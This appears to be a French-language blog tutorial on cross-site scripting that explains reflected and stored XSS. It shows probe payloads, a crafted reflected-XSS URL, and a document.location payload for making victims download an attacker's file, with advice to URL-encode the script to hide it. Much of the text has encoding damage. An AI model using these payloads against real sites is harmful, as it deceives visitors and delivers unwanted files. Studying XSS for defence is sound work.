Faille XSS, Cross Site Scripting, découvez quels sont les avantages de ces failles, découvrez le danger qu'elles représentent ! Lisez notre article !

Qu’est-ce que la faille XSS et comment faire pour l’utiliser ?

La Faille XSS, Cross Site Scripting, dĂ©couvrez quels sont les avantages de ces failles, dĂ©couvrez le danger qu’elles reprĂ©sentent et les types d’attaques qui sont possible, de la simple redirection d’utilisateur Ă  l’injection de fichier en ligne !

Qu’est-ce que la Faille XSS ?

La Faille XSS ou Cross Site Scripting est l’une des failles les plus courantes sur les sites Web.

Cette faille peut ĂȘtre Ă©vitĂ©e, mais parfois les dĂ©veloppeurs web n’y prĂȘtent pas assez attention et ne nettoie pas ou ne vĂ©rifient pas leurs codes, cette faille existe dans les formulaires Web, les sections de commentaires ou partout oĂč la saisie de texte est nĂ©cessaire / requise.

Par exemple certains thĂšmes gratuits de WordPress ou Prestashop sont extrĂȘmement touchĂ©s par certaines failles XSS, les dĂ©veloppeurs tellement pressĂ©s de vendre leur thĂšme fait Ă  la va vite, ne se prĂ©-occupent pas de se phĂ©nomĂšne qui est une grande menace pour les clients qui achĂštent leurs thĂšmes.

Cet article s’ajoute en complĂ©ment Ă  notre prĂ©cĂ©dent article : Comment pirater un site internet ?


Quel sont les impacts de la Faille XSS ?

Elle permets Ă  l’attaquant d’injecter des scripts qui peuvent compromettre le site internet et mener Ă  la divulgation d’informations confidentielles ou au vol de cookies qui peuvent finir par provoquer une usurpation de compte.

QUELQUES TERMES IMPORTANTS AVANT D’ALLER DE L’AVANT :

HTTP REQUEST : Assez simple Ă  comprendre.

A chaque fois que vous lancez une page Web ou obtenez un fichier, votre navigateur fait une requĂȘte http dirigĂ©e vers le serveur du site internet.

Cette requĂȘte http est gĂ©rĂ©e par le serveur web et rĂ©pond en consĂ©quence.

PARAMETRES DE DEMANDE : Un peu plus complexe

C’est lĂ  que le script est injectĂ© dans la plupart des sites faillibles  aux failles xss courantes.

Exemple = http://example.com/test.php?a=1&b=2 Dans cet exemple « a » et « b » sont des paramÚtres avec les valeurs respectives « 1 » et « 2 ».

Le script est le plus souvent injecté dans la valeur du paramÚtre.


Les Types de Failles XSS

Faille REFLECTED OR NON-PERSISTANT XSS : Ce type de faille xss est assez courant.

Ce n’est pas trĂšs dangereux en soi, mais lorsqu’il est combinĂ© Ă  l’ingĂ©nierie sociale, il peut ĂȘtre mortel. Dans ce type de faille xss, la charge utile ou le script fait partie de la requĂȘte http ou de l’URL.

Rien n’est stockĂ© en permanence sur le serveur web dans ce type de xss, il peut ĂȘtre utilisĂ© pour cibler spĂ©cifiquement une personne, il se compose d’un lien de site internet de confiance mais le lien se compose de vecteur/script xss.

Faille XSS : Ce type de xss est le plus dangereux.

Dans ce type de faille xss, l’attaquant injecte un script qui reste stockĂ© de façon permanente sur la page Web de sorte que lorsque quelqu’un visite cette page, le script malveillant est exĂ©cutĂ©.

Cela peut faire beaucoup de dégùts.

Cette faille XSS peut aussi ĂȘtre utilisĂ© pour dĂ©figurer le site web (nous en reparlerons plus tard).


Comment trouver les Failles XSS sur un site web ?

Nous avons donc maintenant une connaissance de base de XSS et nous allons aller un peu plus loin et apprendre comment identifier une faille XSS dans un site Web.

 

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Comme vous pouvez le voir sur la photo, le site contient une zone de saisie.

Donc, pour identifier la faille cela permet d’entrer un script simple dans la zone de saisie

<script>alert(« XSS found »)</script>

Ce script renvoie la rĂ©ponse suivante et confirme qu’il y a une faille xss sur le site.

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Pour ĂȘtre sĂ»r que nous essayons d’injecter un script de plus dans le champ de recherche et que nous puissions voir le rĂ©sultat.

<script>prompt(« XSS found »)</script>

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

Ceci confirme la faille XSS.

C’est un type de xss rĂ©flĂ©chi et maintenant la question est de savoir comment exĂ©cuter le script Ă  partir de l’URL.

Nous allons maintenant analyser les requĂȘtes HTTP faites par le navigateur lorsque nous injectons le script. Voici les paramĂštres de la recherche.

XSS faille

Il y a un total de 4 paramĂštres.

Nous voyons que le script est injectĂ© dans le paramĂštre « roll_number », donc si nous voulons que le script soit exĂ©cutĂ© Ă  partir d’une URL, nous allons devoir construire une URL comme celle-ci

Ainsi, en exĂ©cutant l’URL ci-dessus, notre script est Ă©galement exĂ©cutĂ© comme on peut le voir dans l’image. Nous pouvons exĂ©cuter n’importe quel script de cette façon.

http://www.example.com/find_result.php?submit=Result&m=98&roll_number= »><script>alert(« XSS+found+again »)</script>&s=147


Comment utiliser une Faille XSS pour faire télécharger un fichier à un visiteur ?

Ce sera facile une fois que vous aurez compris tout ce qui précÚde.

Dans l’URL que nous avons construit ci-dessus, si nous remplaçons ce script par le tĂ©lĂ©chargement de votre fichier commencera.

<script>document.location= »Lien de votre fichier »</script>

Faille XSS - Qu'est-ce que c'est et comment l'utiliser ? Notre tutoriel !

L’avantage est que la victime pense que le fichier provient d’un site Web de confiance.

Vous pouvez encoder l’url pour cacher votre script dans l’url.

Ce tutoriel est destiné à un but éducatif afin de pré-munir contre se phénomÚne qui touche de plus en plus les webmasters peu soucieux de leur sécurité.

Publier un commentaire